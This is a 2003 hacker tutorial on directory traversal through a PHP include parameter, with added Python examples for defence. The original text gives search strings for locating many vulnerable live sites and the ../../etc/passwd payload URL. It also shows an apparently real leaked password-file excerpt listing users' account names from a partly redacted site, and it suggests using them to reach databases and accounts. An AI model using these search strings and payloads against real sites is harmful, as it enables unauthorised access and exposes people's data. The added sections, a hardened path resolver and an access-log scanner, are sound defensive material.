"This exploit is known. Old news for some, but new to others. Just my version of events."
===========================
URL manipulation...PHP style
by ComSec
date: 15/5/2003
===========================
OUTLINE:
Target: the password file (/etc/passwd).
The password file will most probably be shadowed, but you still get a lot of info: user names, home paths, MySQL and PostgreSQL database accounts, etc.
You could then test the SQL server for sa access if it is still set to the default, or try SQL injection methods to gain access to the database,
or use the info for other methods of accessing the account. Anyway, on to the exploit.
===========================
There are several search strings that will work; here are a couple.
SEARCH:
inurl:index.php?content=
inurl:index.php?filename=
Search results: 14,000 to 707,000+ links
===========================
EXAMPLES:
http://blahblah.com/index.php?content=contact.php
Replacing contact.php with style.css can, on some sites, if you're lucky, reveal links, paths, etc.
http://www.blahblah.com/index.php?content=style.css
Other sites will return a page error revealing table details, a possible alternative route in.
I then added ../../../../../../../etc/passwd after the equals sign:
http://www.blahblah.com/index.php?content= ../../../../../../../etc/passwd
If the site can be exploited, it will return the password file in your browser.
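The reason the trick above works is that index.php joins whatever arrives in the content parameter straight onto its include path. The following is an added example, not code from the original tutorial or from any site it describes; it is written in Python rather than PHP so the path logic can be run stand-alone, and the directory name, the allowed page list and the page-name pattern are constructed assumptions. vulnerable_resolve() mirrors the flawed join and shows where the ../ sequences end up, and safe_resolve() is the corrected version a defender would put in front of the include call.

```python
import posixpath
import re
from typing import Optional
from urllib.parse import unquote

# Constructed layout for this example (not the page's site): index.php is only
# ever supposed to pull in pages from this one directory.
CONTENT_DIR = "/var/www/html/content"
ALLOWED_PAGES = {"contact.php", "about.php", "news.php"}

# Assumed shape of a legitimate page name: a bare file name, no path parts.
_PAGE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.php$")


def vulnerable_resolve(content_param: str) -> str:
    """Mirror of the flawed include logic behind index.php?content=...

    PHP hands the script a URL-decoded value (unquote() stands in for that) and
    the script joins it onto the include directory with no validation, so '../'
    segments walk out of CONTENT_DIR and an absolute path replaces it outright.
    posixpath.normpath() stands in for the kernel's path resolution.
    """
    return posixpath.normpath(posixpath.join(CONTENT_DIR, unquote(content_param)))


def safe_resolve(content_param: str) -> Optional[str]:
    """Hardened version: returns the path to include, or None to refuse.

    Three independent checks, so a gap in one does not open the include:
      1. the raw value must look like a bare page name (no '/', '..', '%', NUL);
      2. it must be on the explicit allowlist of pages this script serves;
      3. the canonical path must still sit inside CONTENT_DIR.
    """
    if not _PAGE_NAME.fullmatch(content_param):
        return None
    if content_param not in ALLOWED_PAGES:
        return None
    candidate = posixpath.normpath(posixpath.join(CONTENT_DIR, content_param))
    if posixpath.commonpath([CONTENT_DIR, candidate]) != CONTENT_DIR:
        return None
    return candidate


if __name__ == "__main__":
    for value in ("contact.php", "style.css", "../../../../../../../etc/passwd", "/etc/passwd"):
        print(f"{value!r:40} vulnerable -> {vulnerable_resolve(value)!s:32} safe -> {safe_resolve(value)}")
```

Note that the allowlist (check 2) is what actually closes the hole; the regex and the containment check only exist so that a later edit to the allowlist cannot quietly reopen it. In real PHP the equivalent of check 3 is comparing realpath() of the candidate against realpath() of the content directory, which also resolves symlinks, something a pure string normalisation cannot do.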
===========================
ACTUAL EXAMPLE (site name edited, and only a chopped section of the password file shown):
http://www.xxxxx.bc.ca/index.php?content=...../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
games:x:5:100:games:/usr/games:/bin/sh
man:x:6:100:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
majordom:x:30:31:Majordomo:/usr/lib/majordomo:/bin/sh
postgres:x:31:32:postgres:/var/lib/postgres:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
list:x:38:38:SmartList:/var/list:/bin/sh
irc:x:39:39:ircd:/var:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats/gnats-db:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
ftp:x:100:65534::/home/ftp:/bin/false
jvogt:x:1002:1002:,,,:/home/jvogt:/bin/false
lhay:x:1005:1005:,,,:/home/lhay:/bin/false
rgiroday:x:1004:1004:,,,:/home/rgiroday:/bin/false
spider:x:1006:1006:,,,:/var/www:/bin/bash
nwaller:x:1008:1008:,,,:/home/nwaller:/bin/false
donna:x:1009:1009:,,,:/home/donna:/bin/bash
jgoodrich:x:1011:1011:,,,:/home/jgoodrich:/bin/bash
EOF
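A request like the one above leaves an obvious trace in the web server's access log, and a 200 response to it is the sign the include actually succeeded. The scanner below is an added example, not part of the original tutorial; the Apache-style log lines in SAMPLE_LOG are constructed for the demonstration, and the parameter names it watches (content and filename) are the ones from the search strings earlier on this page. It parses each line, pulls the watched parameters out of the query string, fully URL-decodes them (so a %2e%2e%2f spelling of ../ is not missed), and reports any value that walks outside the include directory, together with whether the server answered 200.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format access log lines (not from any real site).
SAMPLE_LOG = """\
203.0.113.7 - - [15/May/2003:10:01:12 +0000] "GET /index.php?content=contact.php HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.7 - - [15/May/2003:10:01:40 +0000] "GET /index.php?content=style.css HTTP/1.1" 200 901 "-" "Mozilla/4.0"
203.0.113.7 - - [15/May/2003:10:02:03 +0000] "GET /index.php?content=../../../../../../../etc/passwd HTTP/1.1" 200 1836 "-" "Mozilla/4.0"
203.0.113.7 - - [15/May/2003:10:02:30 +0000] "GET /index.php?filename=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 404 312 "-" "Mozilla/4.0"
198.51.100.9 - - [15/May/2003:10:03:00 +0000] "GET /index.php?content=news.php HTTP/1.1" 200 4410 "-" "Mozilla/4.0"
"""

# Minimal combined-format parser: client IP, timestamp, method, URI, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) '
)

# Query parameters this particular index.php feeds into include() (from the page).
WATCHED_PARAMS = {"content", "filename"}


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding until the value stops changing."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(value: str) -> bool:
    """True if the value would leave the include directory: a '..' path
    segment, an absolute path, or a backslash (Windows separator)."""
    v = decode_fully(value)
    return ".." in v.split("/") or v.startswith("/") or "\\" in v


def scan_log(text: str) -> list:
    """Return one finding per request whose watched parameter looks like
    directory traversal. A 200 status means the include most likely succeeded
    and the response body should be treated as leaked file contents."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a line this parser understands; skip rather than crash
        query = urlsplit(m["uri"]).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            if name in WATCHED_PARAMS and is_traversal(raw):
                findings.append({
                    "ip": m["ip"],
                    "time": m["ts"],
                    "param": name,
                    "value": decode_fully(raw),
                    "status": int(m["status"]),
                    "likely_success": m["status"] == "200",
                })
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        flag = "LEAK" if hit["likely_success"] else "attempt"
        print(f'{hit["time"]} {hit["ip"]} {hit["param"]}={hit["value"]} -> {hit["status"]} ({flag})')
```

Run it over a real log by replacing SAMPLE_LOG with the file contents. Because PHP decodes the query string once before the script sees it, the decoded value is what was actually passed to include(), which is why findings report that form rather than the raw bytes from the log line.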
*******************
tutorial by ComSec
*******************
Feel free to use/post for educational purposes.
http://comsec.governmentsecurity.org
------------------------------------